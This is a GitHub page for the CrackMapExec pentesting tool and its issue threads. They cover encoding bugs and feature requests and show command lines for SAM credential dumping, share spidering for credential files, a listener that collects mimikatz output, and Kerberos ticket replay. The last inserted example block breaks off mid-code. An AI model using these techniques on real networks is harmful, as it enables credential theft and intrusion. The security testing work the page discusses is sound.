byt3bl33d3r / crackmapexec

A swiss army knife for pentesting networks

License: BSD 2-Clause "Simplified" License


crackmapexec's Introduction

No Longer Maintained

This project is no longer maintained due to the existence of a hostile fork.

CrackMapExec


You are on the latest up-to-date repository of the project CrackMapExec! 🎉

  • 🚧 If you want to report a problem, open an Issue
  • 🔀 If you want to contribute, open a Pull Request
  • 💬 If you want to discuss, open a Discussion

Acknowledgments

(These are the people who did the hard stuff)

This project was originally inspired by:

Unintentional contributors:

  • The Empire project
  • @T-S-A's smbspider script
  • @ConsciousHacker's partial Python port of Invoke-obfuscation from the GreatSCT project

Documentation, Tutorials, Examples

See the project's wiki for documentation and usage examples

Installation

Please see the installation instructions on the official wiki

Code Contributors

Awesome code contributors of CME:

To do

  • 0wn everything

crackmapexec's Issues

Improve results presentation for lusers and sessions modules

Hello @byt3bl33d3r,

It could be a nice thing to better output results for the --lusers and --sessions modules as it is not tabbed:
`print "{} {}".format(fname, yellow(luser[fname]))`
which gives that:

[+] 192.168.11.136:445 DC01 Logged on users:
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username Administrator
wkui1_logon_server DC01
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server

Something like the share presentation, with fixed-size format could be great:
print_att('{:>15} {:>15}'.format('SHARE', 'Permissions'))

Cheers.

UnicodeDecodeError: 'ascii' codec can't decode byte

I really like this tool, but I'm having some problems with encoding.

I'm trying to run it against a host with words like "Administração", "Usuário" so on.

root@host:~/tools/CrackMapExec# git pull
Already up-to-date.

root@host:~/tools/CrackMapExec# ./crackmapexec.py -t 20 -u **USER** -p **PASS** **HOST** --sam
[*] **HOST**:445 is running Windows 5.1 (name:**NAME**) (domain:**DOMAIN**)
[+] **HOST**:445 Login successful **CREDS**
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "./crackmapexec.py", line 3072, in connect
    sam_dump.dump(smb)
  File "./crackmapexec.py", line 1709, in dump
    bootKey = self.__remoteOps.getBootKey()
  File "./crackmapexec.py", line 933, in getBootKey
    self.__bootKey += bootKey[transforms[i]]
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 0: ordinal not in range(128)
<Greenlet at 0xa356cac: connect('**HOST**')> failed with UnicodeDecodeError

root@host:~/tools/CrackMapExec#

Won't launch

Error Code:
/CrackMapExec-master/crackmapexec.py -h
Traceback (most recent call last):
  File "/root/Desktop/Link to opt/CrackMapExec-master/crackmapexec.py", line 16, in <module>
    from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
ImportError: cannot import name drsuapi

Same error!

root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec# python crackmapexec.py -t 100 192.168.192.0-255
[*] 192.168.192.55:445 is running Windows 6.1 Build 7601 (name:ISLAM-EL) (domain:ISLAM-EL)
[*] 192.168.192.11:445 is running Windows 10.0 Build 10240 (name:WIN-9FJM713M56L) (domain:WIN-9FJM713M56L)
[*] 192.168.192.102:445 is running Windows 6.1 Build 7601 (name:ADMIN-PC) (domain:ADMIN-PC)
[*] 192.168.192.60:445 is running Windows 6.1 Build 7601 (name:ADEL-PC) (domain:ADEL-PC)
[*] 192.168.192.104:445 is running Windows 6.3 Build 9600 (name:ASUS) (domain:ASUS)
[*] 192.168.192.97:445 is running Windows 6.1 Build 7600 (name:MAC-MINI-ALEKSEJ) (domain:MACMINI-EB09D7)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2884, in connect
    print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
  File "crackmapexec.py", line 75, in print_status
    cprint("[*] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 63: ordinal not in range(128)
<Greenlet at 0xb64f97acL: connect('192.168.192.51')> failed with UnicodeDecodeError

[*] 192.168.192.186:445 is running Windows 6.3 Build 9600 (name:ISIDORO) (domain:ISIDORO)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2884, in connect
    print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
  File "crackmapexec.py", line 75, in print_status
    cprint("[*] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 67: ordinal not in range(128)
<Greenlet at 0xb5241a2cL: connect('192.168.192.143')> failed with UnicodeDecodeError

[*] 192.168.192.155:445 is running Windows 6.1 Build 7601 (name:ACER-PC) (domain:ACER-PC)
[*] 192.168.192.213:445 is running Windows 6.1 Build 7601 (name:ADMIN-TOSH) (domain:ADMIN-TOSH)
[*] 192.168.192.247:445 is running Windows 6.1 Build 7601 (name:LORRAINE) (domain:LORRAINE)
[*] 192.168.192.166:445 is running Windows 6.3 Build 9600 (name:ILHOM) (domain:ILHOM)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2884, in connect
    print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
  File "crackmapexec.py", line 75, in print_status
    cprint("[*] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 62: ordinal not in range(128)
<Greenlet at 0xb525470cL: connect('192.168.192.183')> failed with UnicodeDecodeError

[*] 192.168.192.230:445 is running Windows 6.1 Build 7601 (name:ASUS) (domain:ASUS)
^CKeyboardInterrupt
[*] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec#

Another error

[+] 192.168.192.224:445 Login successful LENOVO\admin:admin
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 3034, in connect
    share_list = enum_shares(smb)
  File "crackmapexec.py", line 2811, in enum_shares
    if smb.listPath(share_name, '*', args.passwd):
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 344, in listPath
    return self._SMBConnection.list_path(shareName, path, password)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1392, in listPath
    self.close(treeId, fileId)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 974, in close
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 376, in recvSMB
    packet = SMB2Packet(data.get_trailer())
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3structs.py", line 434, in __init__
    Structure.__init__(self,data)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 82, in __init__
    self.fromString(data)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 147, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 291, in unpack
    raise Exception, "Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer)
Exception: ("Unpacked data doesn't match constant value '''' should be ''\\xfeSMB''", 'When unpacking field \'ProtocolID | "\xfeSMB | \'\'[:4]\'')
<Greenlet at 0xb52b920cL: connect('192.168.192.224')> failed with Exception

Inconsistent results presentation for spidering

Hello @byt3bl33d3r ,

There is a weird result presentation for the spidering module.
In the following example I have a credz.txt file in the encoding2 folder, but it is displayed as //192.168.11.133/encoding2\*/credz.txt: why is there the * char before?
I guess it is related to pattern matching.

$ python crackmapexec.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.133 -s share --spider encoding2 --content --pattern cred

[*] 192.168.11.133:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.133:445 Login successful adyolo\user1:yoloswag1!
[*] 192.168.11.133:445 DC01 Started spidering
//192.168.11.133/encoding2\*/credz.txt [lastm:'2015-11-01 22:32' size:25]
[*] 192.168.11.133:445 DC01 Done spidering (Completed in 0.0818431377411)

Add a port option for the HTTP Webserver serving ps scripts

Hello @byt3bl33d3r,

It would also be cool to give users the possibility to set the listening port of the Webserver to a specific value, as:

  • The user might not be privileged to listen on ports 443 and 80
  • Specific egress flows might be allowed on custom ports :)

        if args.ssl:
            httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
            httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
        else:
            httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)

Something like --http-port [port] could be cool!

Cheers.

SMBConnection

Traceback (most recent call last):
  File "crackmapexec.py", line 11, in <module>
    from core.maingreenlet import connect
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in <module>
    from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError

UnicodeEncodeError when using unicode chars in supplied credentials

[-] 192.168.200.44:445 ISIDORO\guest:admin SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2935, in connect
    smb = smart_login(host, smb, domain)
  File "crackmapexec.py", line 2713, in smart_login
    smb.login(user, passwd, domain)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 210, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 678, in login
    blob['MechToken'] = str(auth)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 170, in __str__
    return self.getData()
  File "/usr/local/lib/python2.7/dist-packages/impacket/ntlm.py", line 211, in getData
    return Structure.getData(self)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 121, in getData
    data += self.packField(field[0], field[1])
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 106, in packField
    ans = self.pack(format, self.fields[fieldName], field = fieldName)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 263, in pack
    return str(data)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-8: ordinal not in range(128)
<Greenlet at 0xb6552b1cL: connect('192.168.200.10')> failed with UnicodeEncodeError

[-] 192.168.200.68:445 LS--20150801JUS\admin:admin SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Add a recursive listing option

Hello @byt3bl33d3r,

It could be cool to allow recursive listing of shares.
I might be wrong but it is currently not possible with crackmapexec.

Functionally speaking, I'm thinking about the same stuff such as the auxiliary/scanner/smb/smb_enumshares msf module, with the ability to produce CSV files etc.:

Module options (auxiliary/scanner/smb/smb_enumshares):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   LogSpider        3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
   MaxDepth         999              yes       Max number of subdirectories to spider
   RHOSTS           192.168.11.136   yes       The target address range or CIDR identifier
   SMBDomain        adyolo           no        The Windows domain to use for authentication
   SMBPass          yoloswag1!       no        The password for the specified username
   SMBUser          user1            no        The username to authenticate as
   ShowFiles        true             yes       Show detailed information when spidering
   SpiderProfiles   true             no        Spider only user profiles when share = C$
   SpiderShares     true             no        Spider shares recursively
   THREADS          1                yes       The number of concurrent threads
   USE_SRVSVC_ONLY  false            yes       List shares only with SRVSVC

msf auxiliary(smb_enumshares) > run

[-] 192.168.11.136:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.11.136:445 - Windows 2012 R2  (Unknown)
[+] 192.168.11.136:445 - ADMIN$ - (DS) Remote Admin
[+] 192.168.11.136:445 - C$ - (DS) Default share
[+] 192.168.11.136:445 - IPC$ - (I) Remote IPC
[+] 192.168.11.136:445 - NETLOGON - (DS) Logon server share 
[+] 192.168.11.136:445 - share - (DS) 
[+] 192.168.11.136:445 - SYSVOL - (DS) Logon server share 
[+] 192.168.11.136:445 \\ADYOLO\share
=================================

 Type  Name                Created              Accessed             Written              Changed              Size
 ----  ----                -------              --------             -------              -------              ----
 ARC   blns.txt            11-01-2015 12:06:38  11-01-2015 12:06:38  10-30-2015 22:40:36  10-30-2015 22:40:36  24576
 ARC   create_files.py     11-01-2015 12:03:36  11-01-2015 12:03:36  11-01-2015 12:50:09  11-01-2015 12:50:09  4096
 ARC   credz.txt           11-01-2015 13:22:04  11-01-2015 13:22:04  11-01-2015 13:19:04  11-01-2015 22:32:27  32
 ARC   french_accents.txt  11-01-2015 12:43:05  11-01-2015 12:43:05  11-01-2015 12:45:14  11-01-2015 12:45:14  392
 DIR   encoding2           11-01-2015 12:56:50  11-01-2015 22:50:16  11-01-2015 22:50:16  11-01-2015 22:50:16  0
 DIR   encoding            11-01-2015 12:03:19  11-01-2015 23:03:11  11-01-2015 23:03:11  11-01-2015 23:03:11  0

[+] 192.168.11.136:445 \\ADYOLO\share\encoding
==========================================

 Type  Name                                    Created              Accessed             Written              Changed              Size
 ----  ----                                    -------              --------             -------              -------              ----
 ARC   614_Thk brown fox... [Beeeep].test....  11-01-2015 12:25:28  11-01-2015 12:25:28  11-01-2015 12:25:28  11-01-2015 12:25:30  0
 ARC   567_ZZ                                  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  0
 ARC   566_A                                   11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  0
 ARC   279_' autofocus onkeyup='javascript     11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   274_src=JaVaSCript                      11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   272_JavaSCript                          11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   264_onfocus=JaVaSCript                  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   266_' onfocus=JaVaSCript                11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 DIR   22_.test                                11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   18_.test                                11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   17_                                     11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   16_                                     11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   15_None.test                            11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   14_False.test                           11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
...

Cheers.

Rewrite the mimikatz result parsing section

Hello @byt3bl33d3r,

Currently, your mimikatz results parsing with --mimikatz option could generate an exception.

  1. Send a raw HTTP POST request with the following body:
Password: toto
Domain: toto
User: titi
  2. Your buf variable is equal to ['Password: totoDomain: totoUser: titi'], so only 1 item
  3. See the following bug related to a non-existent index in the buf variable:
192.168.11.136 - - [08/Nov/2015 19:01:07] "POST /toto HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('192.168.11.136', 56129)
Traceback (most recent call last):
  File "C:\Python27\lib\SocketServer.py", line 295, in _handle_request_noblock
    self.process_request(request, client_address)
  File "C:\Python27\lib\SocketServer.py", line 321, in process_request
    self.finish_request(request, client_address)
  File "C:\Python27\lib\SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "C:\Python27\lib\SocketServer.py", line 655, in __init__
    self.handle()
  File "C:\Python27\lib\BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "C:\Python27\lib\BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "crackmapexecwin.py", line 266, in do_POST
    user   = buf[i-2].split(':')[1].strip()
IndexError: list index out of range

Relying on receiving good CRLF-formatted input is not really reliable.
Moreover, you could even try to parse the result before writing anything (for instance with that implementation), because as the attacker has a listening web server on for that feature, he could be attacked by automated scanners that would fill his disk with wrong/polluted data :)
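As an added example (not the project's code), here is a parser for the `Key: value` body shape described in this issue that does not depend on CRLF separators and validates the record before anything is written. `parse_record`, `handle_post`, `EXPECTED_KEYS` and the size cap are my own names and assumptions; the run-together body is the one quoted above.

```python
import re

# The three keys the listener expects in a POSTed body (from the issue).
EXPECTED_KEYS = ("User", "Domain", "Password")

# Assumed upper bound on a body worth parsing. Anything larger is rejected before
# it is looked at, so an automated scanner cannot fill the disk with junk.
MAX_BODY_BYTES = 4096

# "Key: value" where the value runs until the next key or the end of the text.
# This works whether keys are separated by CRLF, LF, or nothing at all
# (the 'Password: totoDomain: totoUser: titi' case from the issue).
_RECORD_RE = re.compile(
    r"(?P<key>User|Domain|Password)\s*:\s*"
    r"(?P<value>.*?)"
    r"(?=\s*(?:User|Domain|Password)\s*:|\Z)",
    re.DOTALL,
)


def parse_record(body: bytes):
    """Return {'User': ..., 'Domain': ..., 'Password': ...} or None.

    None means the body is not a well-formed record: too large, missing a key,
    a duplicated key (ambiguous), or an empty user name.
    """
    if not isinstance(body, bytes) or len(body) > MAX_BODY_BYTES:
        return None
    # Never raise on odd bytes; replace them so a bad byte cannot crash the handler.
    text = body.decode("utf-8", errors="replace")
    found = {}
    for match in _RECORD_RE.finditer(text):
        key = match.group("key")
        if key in found:
            return None
        found[key] = match.group("value").strip()
    if any(key not in found for key in EXPECTED_KEYS):
        return None
    if not found["User"]:
        return None
    return found


def handle_post(body: bytes, sink: list) -> bool:
    """Store the record in `sink` (a constructed stand-in for the output file)
    only when it validates; return whether it was stored."""
    record = parse_record(body)
    if record is None:
        return False
    sink.append(record)
    return True


if __name__ == "__main__":
    # Constructed sample bodies: the run-together one from the issue, a
    # well-formed CRLF one, and junk such as a scanner would send.
    store = []
    for sample in (b"Password: totoDomain: totoUser: titi",
                   b"Password: toto\r\nDomain: toto\r\nUser: titi\r\n",
                   b"<html>scanner junk</html>"):
        print(sample, "->", "stored" if handle_post(sample, store) else "rejected")
    print(store)
```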

Improve output

Hello @byt3bl33d3r,

For the results presentation, could you insert an empty line between hosts in order to make it clearer?

Cheers.

Add file content searching support

Hello again,

It would also be cool to have a native file search command in CrackMapExec, going further than just listing dirs (which is already cool btw).
You could be inspired by the Invoke-FileFinder function from PowerView module :)

Cheers.

Username and password unicode support

@byt3bl33d3r,

I faced some unicode errors regarding user names.
In the following example, I do have a user named 'Invité' (French for 'guest').

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec# python -i crackmapexec.py -t 2 192.168.11.129 -u admin -p admin --shares --users
[*] 192.168.11.129:445 is running Windows 6.1 Build 7601 (name:WIN-P3B5MV8U1LT) (domain:WIN-P3B5MV8U1LT)
[+] 192.168.11.129:445 Login successful 'WIN-P3B5MV8U1LT\admin:admin'
[+] 192.168.11.129:445 WIN-P3B5MV8U1LT Dumping users (rid:user):
1000: Admin
500: Administrateur
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2872, in connect
    print_att('{}: {}'.format(user[1], user[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe9' in position 5: ordinal not in range(128)
<Greenlet at 0xb6754b6cL: connect('192.168.11.129')> failed with UnicodeEncodeError

I have been able to fix it by changing the following code section (line 2872):
from

for user in users:
                    print_att('{}: {}'.format(user[1], user[0]))

to

for user in users:
                    print_att(u'{}: {}'.format(user[1], user[0]))

I guess that this lack of unicode support is not limited to this module (dumping usernames). Maybe you could try to find a way to include that support in your lambda print_* functions.

Cheers

Error

[*] 192.168.192.101:445 is running Windows 6.3 Build 9600 (name:JABAR) (domain:JABAR)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2929, in connect
    smb.logoff()
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 293, in logoff
    return self._SMBConnection.logoff()
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1234, in logoff
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 356, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
    raise NetBIOSTimeout
NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
<Greenlet at 0xb528c52cL: connect('192.168.192.134')> failed with NetBIOSTimeout

^CKeyboardInterrupt
[*] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec#

Multiple actions asked, global fail at first fail

Hello @byt3bl33d3r,

I'm reporting a bug related to multiple actions execution. Indeed, if you specify multiple actions comprising at least one that is not authorized, the whole execution will fail and you won't even see the authorized one.

In this example the user:

  • ... can enumerate shares:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --shares 
11-29-2015 14:15:41 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:15:41 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:15:41 [+] 192.168.11.136:445 Available shares:
11-29-2015 14:15:41           SHARE     Permissions
11-29-2015 14:15:41           -----     -----------
11-29-2015 14:15:41          ADMIN$       NO ACCESS
11-29-2015 14:15:41            IPC$            READ
11-29-2015 14:15:41           share     READ, WRITE
11-29-2015 14:15:41          SYSVOL            READ
11-29-2015 14:15:41              C$       NO ACCESS
11-29-2015 14:15:41        NETLOGON            READ
  • ...but cannot list the content of one:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --list share
11-29-2015 14:20:26 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:20:26 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:20:26 [-] 192.168.11.136:445 SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Now, if I ask for both actions in the same command line, both will fail as I won't see the authorized one:

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --shares --list share
11-29-2015 14:21:54 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:21:54 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:21:54 [-] 192.168.11.136:445 SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Cheers
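As an added example (not the project's code), the behaviour this issue asks for: each requested action is run in its own try block, so an access-denied listing does not hide the share enumeration, while a transport-level failure (the NetBIOSTimeout seen elsewhere on this page) still stops the remaining actions. `SessionError`, `NetBIOSTimeout`, `run_actions` and the `fake_*` actions are constructed stand-ins, not impacket's or CME's classes.

```python
class SessionError(Exception):
    """Constructed stand-in for an SMB session error such as STATUS_ACCESS_DENIED."""


class NetBIOSTimeout(Exception):
    """Constructed stand-in for a transport failure: the connection itself is gone."""


def run_actions(actions):
    """Run each (name, callable) in turn and return {name: (status, payload)}.

    A SessionError marks only that action as 'denied' and the loop continues,
    so '--shares --list share' still reports the shares. A NetBIOSTimeout is
    fatal: the action is marked 'error', the remaining ones 'skipped', because
    nothing else can succeed on a dead connection.
    """
    results = {}
    fatal = None
    for name, action in actions:
        if fatal is not None:
            results[name] = ("skipped", fatal)
            continue
        try:
            results[name] = ("ok", action())
        except SessionError as exc:
            results[name] = ("denied", str(exc))
        except NetBIOSTimeout as exc:
            fatal = str(exc)
            results[name] = ("error", fatal)
    return results


# Constructed stand-ins for the two actions from the issue, as seen by user1.
def fake_enum_shares():
    return [("ADMIN$", "NO ACCESS"), ("IPC$", "READ"), ("share", "READ, WRITE"),
            ("SYSVOL", "READ"), ("C$", "NO ACCESS"), ("NETLOGON", "READ")]


def fake_list_share(share):
    raise SessionError("STATUS_ACCESS_DENIED")


def fake_timeout():
    raise NetBIOSTimeout("The NETBIOS connection with the remote host timed out.")


def demo_denied():
    """--shares --list share: the listing is denied, the shares are still reported."""
    return run_actions([("shares", fake_enum_shares),
                        ("list share", lambda: fake_list_share("share"))])


def demo_timeout():
    """A transport error aborts everything that follows it."""
    return run_actions([("shares", fake_enum_shares),
                        ("sessions", fake_timeout),
                        ("list share", lambda: fake_list_share("share"))])


if __name__ == "__main__":
    for name, (status, payload) in demo_denied().items():
        print("[{}] {}: {}".format("+" if status == "ok" else "-", name, payload))
```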

Install problem

I ran pip install --upgrade -r requirements.txt on Kali2.
It seemed to complete successfully, but when I run:
python crackmapexec.py
I get this error:
Traceback (most recent call last):
  File "crackmapexec.py", line 16, in <module>
    from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
ImportError: cannot import name drsuapi

When I try and install drsuapi
I'm told:
Requirement already satisfied (use --upgrade to upgrade): impacket in /usr/lib/python2.7/dist-packages

Default thread number

Hello @byt3bl33d3r,

I think that it would be cool if a default thread number was set, to avoid the frustration of forgetting the -t option :)

Kerberos ticket loading support on Windows

Hello @byt3bl33d3r,

As I'm going through the new features you added and how they could be used from Windows hosts, I would like to know if you wanted to add Windows support for the Kerberos ticket loading (--kerb and -k).
The thing is you actually rely on impacket's implementation, which loads the $KRB5CCNAME env variable to find tickets, which is obviously related to the Unix world.

So my point is to allow a user who would have grabbed tickets with mimikatz to be able to replay them through crackmapexecwin. That link gives the modus operandi:

  • The attacker should first convert it with kirbikator
  • The attacker should then use a Unix/Linux client to load it: this is the step I want to avoid, as I'd like to load it from Windows.

By quickly looking at impacket code, it could be possible to achieve this by calling CCache.loadFile() with a custom Windows path (user specified).
What do you think about it?

I'm aware that this might rather be an impacket issue, so I'll also post it on their GitHub section.

Cheers.

Still some encoding issues

Hello @byt3bl33d3r,

I would like to report (again) some encoding issues.
Steps to reproduce:

  1. Create a file named àâæçéèêëïîôœ—– »« ”’€ÿüûù.txt on a share. Note that this contains french accents.
  2. List that share
  3. See the bug:

$ python crackmapexec.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 -s share --list encoding2
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
[+] 192.168.11.136:445 Contents of encoding2\*:
drw-rw-rw-       0 2015-11-01 22:50 .
drw-rw-rw-       0 2015-11-01 22:50 ..
-rw-rw-rw-      25 2015-11-01 22:32 credz.txt
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2903, in connect
    f.get_longname()))
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-13: ordinal not in range(128)
<Greenlet at 0xb679bbbcL: connect('192.168.11.136')> failed with UnicodeEncodeError

I managed to fix this by editing the line #2093
from:

f.get_longname()

to:

f.get_longname().encode('utf-8')

It gives that output:

python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 -s share --list encoding2
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
[+] 192.168.11.136:445 Contents of encoding2\*:
drw-rw-rw-       0 2015-11-01 22:50 .
drw-rw-rw-       0 2015-11-01 22:50 ..
-rw-rw-rw-      25 2015-11-01 22:32 credz.txt
-rw-rw-rw-      33 2015-11-01 13:14 àâæçéèêëïîôœ—– »« ”’€ÿüûù.txt

I saw you modified the print_* functions but I don't understand why utf-8 decoding fails at this point.

Finally, note that these encoding issues might exist for other features, every feature calling the longname() function.

Cheers.
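As an added example (not the project's code), one helper that serves both the lusers/sessions presentation request earlier on this page and the two username/filename encoding issues: the flat `wkui1_*` key/value stream is grouped into one record per logged-on user and printed with the fixed-width, right-aligned columns the share listing already uses, and every value goes through `to_text`, which decodes bytes as UTF-8 with replacement so a name like 'Invité' or a stray byte never raises. `to_text`, `group_records`, `format_table` and the sample rows are my own names and constructed data; the third record is invented to carry a non-ASCII name.

```python
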